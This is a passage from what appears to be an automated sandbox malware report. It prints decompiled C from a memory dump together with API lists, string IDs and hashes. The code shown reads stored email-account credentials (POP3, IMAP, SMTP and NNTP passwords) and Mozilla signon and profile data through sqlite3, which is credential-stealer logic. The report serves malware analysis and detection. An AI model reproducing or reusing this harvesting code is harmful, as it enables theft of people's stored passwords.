                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					_t249 = 0;
                                                                                					_v36 = _t232 + 1;
                                                                                					while(1) {
                                                                                						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
                                                                                						_v8 = _t205;
                                                                                						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
                                                                                						_t256 = _t256 + 0x10;
                                                                                						if(_t206 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t249 = _t249 + 1;
                                                                                						if(_t249 < 6) {
                                                                                							continue;
                                                                                						}
                                                                                						_t209 = _a8;
                                                                                						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
                                                                                							L29:
                                                                                							_v8 = _v8 & 0x00000000;
                                                                                							while(1) {
                                                                                								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
                                                                                								_v40 = _t211;
                                                                                								_t250 = strlen(_t211);
                                                                                								_t213 = strncmp(_v36, _v40, _t250);
                                                                                								_t256 = _t256 + 0x10;
                                                                                								if(_t213 == 0) {
                                                                                									break;
                                                                                								}
                                                                                								_v8 = _v8 + 1;
                                                                                								if(_v8 < 0x5f) {
                                                                                									continue;
                                                                                								}
                                                                                								_t203 = _v13;
                                                                                								goto L33;
                                                                                							}
                                                                                							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
                                                                                							_t231 = _t231 + 1;
                                                                                							_t254 = _t254 + _t250 + 1;
                                                                                							goto L43;
                                                                                						}
                                                                                						_t128 = _t209 + 2; // 0x2
                                                                                						_t251 = _t254 + _t128;
                                                                                						_t237 =  *_t251;
                                                                                						if(_t237 == 0x78 || _t237 == 0x58) {
                                                                                							_t159 = _t209 + 3; // 0x3
                                                                                							_t245 = _t254 + _t159;
                                                                                							_t238 = _t245;
                                                                                							_t252 = 0;
                                                                                							while(1) {
                                                                                								_t216 =  *_t238;
                                                                                								if(_t216 == 0) {
                                                                                									break;
                                                                                								}
                                                                                								if(_t216 == 0x3b) {
                                                                                									L27:
                                                                                									if(_t252 <= 0) {
                                                                                										goto L29;
                                                                                									}
                                                                                									memcpy( &_v88, _t245, _t252);
                                                                                									 *((char*)(_t255 + _t252 - 0x54)) = 0;
                                                                                									_t220 = E00406512( &_v88);
                                                                                									_t256 = _t256 + 0x10;
                                                                                									 *((char*)(_t231 + _a4)) = _t220;
                                                                                									_t231 = _t231 + 1;
                                                                                									_t254 = _t254 + _t252 + 4;
                                                                                									goto L43;
                                                                                								}
                                                                                								_t252 = _t252 + 1;
                                                                                								if(_t252 >= 4) {
                                                                                									break;
                                                                                								}
                                                                                								_t238 = _t238 + 1;
                                                                                							}
                                                                                							_t252 = _t252 | 0xffffffff;
                                                                                							goto L27;
                                                                                						} else {
                                                                                							_t240 = _t251;
                                                                                							_t246 = 0;
                                                                                							while(1) {
                                                                                								_t221 =  *_t240;
                                                                                								if(_t221 == 0) {
                                                                                									break;
                                                                                								}
                                                                                								if(_t221 == 0x3b) {
                                                                                									_v8 = _t246;
                                                                                									L18:
                                                                                									if(_v8 <= 0) {
                                                                                										goto L29;
                                                                                									}
                                                                                									memcpy( &_v76, _t251, _v8);
                                                                                									 *((char*)(_t255 + _v8 - 0x48)) = 0;
                                                                                									_t226 = atoi( &_v76);
                                                                                									_t256 = _t256 + 0x10;
                                                                                									_v32 = _t226;
                                                                                									_v12 = 0;
                                                                                									asm("stosb");
                                                                                									_v30 = 0;
                                                                                									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
                                                                                									 *((char*)(_t231 + _a4)) = _v12;
                                                                                									_t231 = _t231 + 1;
                                                                                									_t254 = _t254 + _v8 + 3;
                                                                                									goto L43;
                                                                                								}
                                                                                								_t246 = _t246 + 1;
                                                                                								if(_t246 >= 6) {
                                                                                									break;
                                                                                								}
                                                                                								_t240 = _t240 + 1;
                                                                                							}
                                                                                							_v8 = _v8 | 0xffffffff;
                                                                                							goto L18;
                                                                                						}
                                                                                					}
                                                                                					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
                                                                                					_t231 = _t231 + 1;
                                                                                					_t254 = _t254 + _v8 + 1;
                                                                                					goto L43;
                                                                                				}
                                                                                				goto L45;
                                                                                			}

                                                                                APIs
                                                                                • strlen.MSVCRT ref: 0040FC27
                                                                                • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                                                • memcpy.MSVCRT ref: 0040FCB3
                                                                                • atoi.MSVCRT ref: 0040FCC4
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                • API String ID: 1895597112-3210201812
                                                                                • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
                                                                                • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E004106BE(void* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				int _t58;
                                                                                				int _t59;
                                                                                				int _t60;
                                                                                				int _t61;
                                                                                				int _t63;
                                                                                				void* _t96;
                                                                                				void* _t99;
                                                                                				void* _t102;
                                                                                				void* _t105;
                                                                                				void* _t108;
                                                                                				void* _t111;
                                                                                				void* _t114;
                                                                                				void* _t117;
                                                                                				void* _t123;
                                                                                				void* _t194;
                                                                                				void* _t196;
                                                                                				void* _t201;
                                                                                				char* _t202;
                                                                                
                                                                                				_t194 = __edx;
                                                                                				_t201 = __ecx;
                                                                                				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
                                                                                					_t204 = _t201 + 0x460;
                                                                                					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
                                                                                					_t123 = E00406B74( *_t204);
                                                                                					_t195 = _t201 + 0xf84;
                                                                                					E004060D0(0xff, _t201 + 0xf84, _t123);
                                                                                				}
                                                                                				_t202 = _t201 + 0x46c;
                                                                                				if(strcmp(_t202, "POP3_Server") == 0) {
                                                                                					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                					_t195 = _t201 + 0x970;
                                                                                					E004060D0(0xff, _t201 + 0x970, _t117);
                                                                                				}
                                                                                				if(strcmp(_t202, "IMAP_Server") == 0) {
                                                                                					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                					_t195 = _t201 + 0x970;
                                                                                					E004060D0(0xff, _t201 + 0x970, _t114);
                                                                                				}
                                                                                				if(strcmp(_t202, "NNTP_Server") == 0) {
                                                                                					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                					_t195 = _t201 + 0x970;
                                                                                					E004060D0(0xff, _t201 + 0x970, _t111);
                                                                                				}
                                                                                				if(strcmp(_t202, "SMTP_Server") == 0) {
                                                                                					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                					_t195 = _t201 + 0x1084;
                                                                                					E004060D0(0xff, _t201 + 0x1084, _t108);
                                                                                				}
                                                                                				if(strcmp(_t202, "POP3_User_Name") == 0) {
                                                                                					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                					_t195 = _t201 + 0xb70;
                                                                                					E004060D0(0xff, _t201 + 0xb70, _t105);
                                                                                					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
                                                                                				}
                                                                                				if(strcmp(_t202, "IMAP_User_Name") == 0) {
                                                                                					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                					_t195 = _t201 + 0xb70;
                                                                                					E004060D0(0xff, _t201 + 0xb70, _t102);
                                                                                					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
                                                                                				}
                                                                                				if(strcmp(_t202, "NNTP_User_Name") == 0) {
                                                                                					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                					_t195 = _t201 + 0xb70;
                                                                                					E004060D0(0xff, _t201 + 0xb70, _t99);
                                                                                					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
                                                                                				}
                                                                                				if(strcmp(_t202, "SMTP_User_Name") == 0) {
                                                                                					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                					_t195 = _t201 + 0x1284;
                                                                                					E004060D0(0xff, _t201 + 0x1284, _t96);
                                                                                					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
                                                                                				}
                                                                                				_t58 = strcmp(_t202, "POP3_Password2");
                                                                                				_t214 = _t58;
                                                                                				if(_t58 == 0) {
                                                                                					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
                                                                                				}
                                                                                				_t59 = strcmp(_t202, "IMAP_Password2");
                                                                                				_t215 = _t59;
                                                                                				if(_t59 == 0) {
                                                                                					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
                                                                                				}
                                                                                				_t60 = strcmp(_t202, "NNTP_Password2");
                                                                                				_t216 = _t60;
                                                                                				if(_t60 == 0) {
                                                                                					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
                                                                                				}
                                                                                				_t61 = strcmp(_t202, "SMTP_Password2");
                                                                                				_t217 = _t61;
                                                                                				if(_t61 == 0) {
                                                                                					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
                                                                                				}
                                                                                				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
                                                                                					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                                				}
                                                                                				_t63 = strcmp(_t202, "SMTP_Email_Address");
                                                                                				if(_t63 == 0) {
                                                                                					_t203 = _t201 + 0x460;
                                                                                					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
                                                                                					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
                                                                                				}
                                                                                				_push("SMTP_Port");
                                                                                				_t196 = _t201 + 0x46c;
                                                                                				_push(_t196);
                                                                                				L004115DC();
                                                                                				if(_t63 == 0) {
                                                                                					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                                					 *(_t201 + 0x168c) = _t63;
                                                                                				}
                                                                                				_push("NNTP_Port");
                                                                                				_push(_t196);
                                                                                				L004115DC();
                                                                                				if(_t63 == 0) {
                                                                                					L35:
                                                                                					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                                					 *(_t201 + 0xf78) = _t63;
                                                                                				} else {
                                                                                					_push("IMAP_Port");
                                                                                					_push(_t196);
                                                                                					L004115DC();
                                                                                					if(_t63 == 0) {
                                                                                						goto L35;
                                                                                					} else {
                                                                                						_push("POP3_Port");
                                                                                						_push(_t196);
                                                                                						L004115DC();
                                                                                						if(_t63 == 0) {
                                                                                							goto L35;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_push("SMTP_Secure_Connection");
                                                                                				_push(_t196);
                                                                                				L004115DC();
                                                                                				if(_t63 == 0) {
                                                                                					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                                					 *(_t201 + 0x1690) = _t63;
                                                                                				}
                                                                                				_push("NNTP_Secure_Connection");
                                                                                				_push(_t196);
                                                                                				L004115DC();
                                                                                				if(_t63 == 0) {
                                                                                					L41:
                                                                                					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                                				} else {
                                                                                					_push("IMAP_Secure_Connection");
                                                                                					_push(_t196);
                                                                                					L004115DC();
                                                                                					if(_t63 == 0) {
                                                                                						goto L41;
                                                                                					} else {
                                                                                						_push("POP3_Secure_Connection");
                                                                                						_push(_t196);
                                                                                						L004115DC();
                                                                                						if(_t63 == 0) {
                                                                                							goto L41;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return 1;
                                                                                			}
                                                                                0x00410a59
                                                                                0x00410a59
                                                                                0x00410a5e
                                                                                0x00410a5f
                                                                                0x00410a68
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410a68
                                                                                0x00410a57
                                                                                0x00410a89

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcmp$_stricmp$memcpystrlen
                                                                                • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                • API String ID: 1113949926-2499304436
                                                                                • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                                                • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 74%
                                                                                			E0040C7CF(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v16;
                                                                                				void _v271;
                                                                                				char _v272;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				int _t64;
                                                                                				int _t66;
                                                                                				int _t68;
                                                                                				int _t69;
                                                                                				int _t72;
                                                                                				int _t85;
                                                                                				void* _t91;
                                                                                				void* _t132;
                                                                                				char* _t133;
                                                                                				char* _t135;
                                                                                				char* _t137;
                                                                                				char* _t139;
                                                                                				intOrPtr _t151;
                                                                                				int _t153;
                                                                                				int _t154;
                                                                                				void* _t155;
                                                                                
                                                                                				_t132 = __edx;
                                                                                				_v12 = __ecx;
                                                                                				_v272 = 0;
                                                                                				memset( &_v271, 0, 0xff);
                                                                                				_t133 = "mail.account.account";
                                                                                				_t64 = strlen(_t133);
                                                                                				_t148 = _t64;
                                                                                				_t134 = _a4;
                                                                                				if(strncmp(_a4, _t133, _t64) != 0) {
                                                                                					_v8 = _v8 & 0x00000000;
                                                                                				} else {
                                                                                					_v8 = E0040C748(_t134,  &_v16, _t148);
                                                                                				}
                                                                                				if(_v8 != 0) {
                                                                                					_push("identities");
                                                                                					_push(_v8);
                                                                                					L004115B2();
                                                                                					if(_t91 == 0) {
                                                                                						_t17 = _t155 + 0x604; // 0x604
                                                                                						E004060D0(0xff, _t17, _a8);
                                                                                					}
                                                                                				}
                                                                                				_t135 = "mail.server";
                                                                                				_t66 = strlen(_t135);
                                                                                				_t149 = _t66;
                                                                                				_t136 = _a4;
                                                                                				if(strncmp(_a4, _t135, _t66) != 0) {
                                                                                					_v8 = _v8 & 0x00000000;
                                                                                				} else {
                                                                                					_v8 = E0040C6F3(_t149, _t136,  &_v272);
                                                                                				}
                                                                                				if(_v8 != 0) {
                                                                                					_t85 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
                                                                                					_push("username");
                                                                                					_push(_v8);
                                                                                					_t154 = _t85;
                                                                                					L004115B2();
                                                                                					if(_t85 == 0) {
                                                                                						_t28 = _t154 + 0x204; // 0x204
                                                                                						_t85 = E004060D0(0xff, _t28, _a8);
                                                                                					}
                                                                                					_push("type");
                                                                                					_push(_v8);
                                                                                					L004115B2();
                                                                                					if(_t85 == 0) {
                                                                                						_t31 = _t154 + 0x504; // 0x504
                                                                                						_t85 = E004060D0(0xff, _t31, _a8);
                                                                                					}
                                                                                					_push("hostname");
                                                                                					_push(_v8);
                                                                                					L004115B2();
                                                                                					if(_t85 == 0) {
                                                                                						_t34 = _t154 + 0x104; // 0x104
                                                                                						_t85 = E004060D0(0xff, _t34, _a8);
                                                                                					}
                                                                                					_push("port");
                                                                                					_push(_v8);
                                                                                					L004115B2();
                                                                                					if(_t85 == 0) {
                                                                                						_t85 = atoi(_a8);
                                                                                						 *(_t154 + 0x804) = _t85;
                                                                                					}
                                                                                					_push("useSecAuth");
                                                                                					_push(_v8);
                                                                                					L004115B2();
                                                                                					if(_t85 == 0) {
                                                                                						_push("true");
                                                                                						_push(_a8);
                                                                                						L004115B2();
                                                                                						if(_t85 == 0) {
                                                                                							 *((intOrPtr*)(_t154 + 0x808)) = 1;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_t137 = "mail.identity";
                                                                                				_t68 = strlen(_t137);
                                                                                				_t150 = _t68;
                                                                                				_t138 = _a4;
                                                                                				_t69 = strncmp(_a4, _t137, _t68);
                                                                                				if(_t69 != 0) {
                                                                                					_v8 = _v8 & 0x00000000;
                                                                                				} else {
                                                                                					_t69 = E0040C6F3(_t150, _t138,  &_v272);
                                                                                					_v8 = _t69;
                                                                                				}
                                                                                				if(_v8 != 0) {
                                                                                					_t69 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
                                                                                					_push("useremail");
                                                                                					_push(_v8);
                                                                                					_t153 = _t69;
                                                                                					L004115B2();
                                                                                					if(_t69 == 0) {
                                                                                						_t51 = _t153 + 0x404; // 0x404
                                                                                						_t69 = E004060D0(0xff, _t51, _a8);
                                                                                					}
                                                                                					_push("fullname");
                                                                                					_push(_v8);
                                                                                					L004115B2();
                                                                                					if(_t69 == 0) {
                                                                                						_t54 = _t153 + 4; // 0x4
                                                                                						_t69 = E004060D0(0xff, _t54, _a8);
                                                                                					}
                                                                                				}
                                                                                				_push("signon.signonfilename");
                                                                                				_push(_a4);
                                                                                				L004115B2();
                                                                                				if(_t69 == 0) {
                                                                                					_t151 = _v12;
                                                                                					_t139 = _t151 + 0x245;
                                                                                					_t152 = _t151 + 0x140;
                                                                                					_t72 = strlen(_t151 + 0x140);
                                                                                					_t60 = strlen(_a8) + 1; // 0x1
                                                                                					if(_t72 + _t60 >= 0x104) {
                                                                                						 *_t139 = 0;
                                                                                					} else {
                                                                                						E004062AD(_t139, _t152, _a8);
                                                                                					}
                                                                                				}
                                                                                				return 1;
                                                                                			}

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C7F4
                                                                                • strlen.MSVCRT ref: 0040C7FF
                                                                                • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C80C
                                                                                • _stricmp.MSVCRT(00000000,server), ref: 0040C849
                                                                                • _stricmp.MSVCRT(00000000,identities), ref: 0040C86B
                                                                                • strlen.MSVCRT ref: 0040C88B
                                                                                • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040C898
                                                                                • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040C8E1
                                                                                • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040C903
                                                                                • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040C925
                                                                                • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040C947
                                                                                • atoi.MSVCRT ref: 0040C955
                                                                                  • Part of subcall function 0040C748: memset.MSVCRT ref: 0040C77E
                                                                                  • Part of subcall function 0040C748: memcpy.MSVCRT ref: 0040C7A0
                                                                                  • Part of subcall function 0040C748: atoi.MSVCRT ref: 0040C7B4
                                                                                • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040C969
                                                                                • _stricmp.MSVCRT(?,true,00000000), ref: 0040C97C
                                                                                • strlen.MSVCRT ref: 0040C997
                                                                                • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040C9A4
                                                                                • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040C9E9
                                                                                • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CA0B
                                                                                • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CA2A
                                                                                • strlen.MSVCRT ref: 0040CA45
                                                                                • strlen.MSVCRT ref: 0040CA4F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                                                • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                • API String ID: 736090197-593045482
                                                                                • Opcode ID: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                • Instruction ID: 8e23c8f9271997a3be880b93158be8956f510041fead3e1da2e0ecaa9a645c54
                                                                                • Opcode Fuzzy Hash: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                • Instruction Fuzzy Hash: E271C972504204FADF10EB65CC42BDE77A6DF50329F20426BF506B21E1EB79AF819A5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040F64B(intOrPtr* __esi, char* _a4) {
                                                                                				void _v283;
                                                                                				char _v284;
                                                                                				void _v547;
                                                                                				char _v548;
                                                                                				struct HINSTANCE__* _t45;
                                                                                				struct HINSTANCE__* _t46;
                                                                                				struct HINSTANCE__* _t57;
                                                                                				struct HINSTANCE__* _t68;
                                                                                				CHAR* _t79;
                                                                                				intOrPtr* _t81;
                                                                                
                                                                                				_t81 = __esi;
                                                                                				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
                                                                                					L14:
                                                                                					return 1;
                                                                                				}
                                                                                				_v284 = 0;
                                                                                				memset( &_v283, 0, 0x117);
                                                                                				if(_a4 == 0) {
                                                                                					E0040F435( &_v284);
                                                                                				} else {
                                                                                					strcpy( &_v284, _a4);
                                                                                				}
                                                                                				if(_v284 == 0) {
                                                                                					_t79 = "sqlite3.dll";
                                                                                					_t45 = GetModuleHandleA(_t79);
                                                                                					 *(_t81 + 0x24) = _t45;
                                                                                					if(_t45 != 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t57 = LoadLibraryA(_t79);
                                                                                					goto L11;
                                                                                				} else {
                                                                                					_v548 = 0;
                                                                                					memset( &_v547, 0, 0x104);
                                                                                					strcpy( &_v548,  &_v284);
                                                                                					strcat( &_v284, "\\sqlite3.dll");
                                                                                					if(E0040614B( &_v284) == 0) {
                                                                                						strcpy( &_v284,  &_v548);
                                                                                						strcat( &_v284, "\\mozsqlite3.dll");
                                                                                					}
                                                                                					_t68 = GetModuleHandleA( &_v284);
                                                                                					 *(_t81 + 0x24) = _t68;
                                                                                					if(_t68 != 0) {
                                                                                						L12:
                                                                                						_t46 =  *(_t81 + 0x24);
                                                                                						if(_t46 == 0) {
                                                                                							return 0;
                                                                                						}
                                                                                						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
                                                                                						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
                                                                                						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
                                                                                						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
                                                                                						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
                                                                                						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
                                                                                						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
                                                                                						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
                                                                                						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
                                                                                						goto L14;
                                                                                					} else {
                                                                                						_t57 = LoadLibraryExA( &_v284, 0, 8);
                                                                                						L11:
                                                                                						 *(_t81 + 0x24) = _t57;
                                                                                						goto L12;
                                                                                					}
                                                                                				}
                                                                                			}














                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F674
                                                                                • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                                                • memset.MSVCRT ref: 0040F6B8
                                                                                • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                                                • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                                                • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                                                • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                                                • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                                                • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                                                • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                                                • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                • API String ID: 3567885941-2042458128
                                                                                • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                                                • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
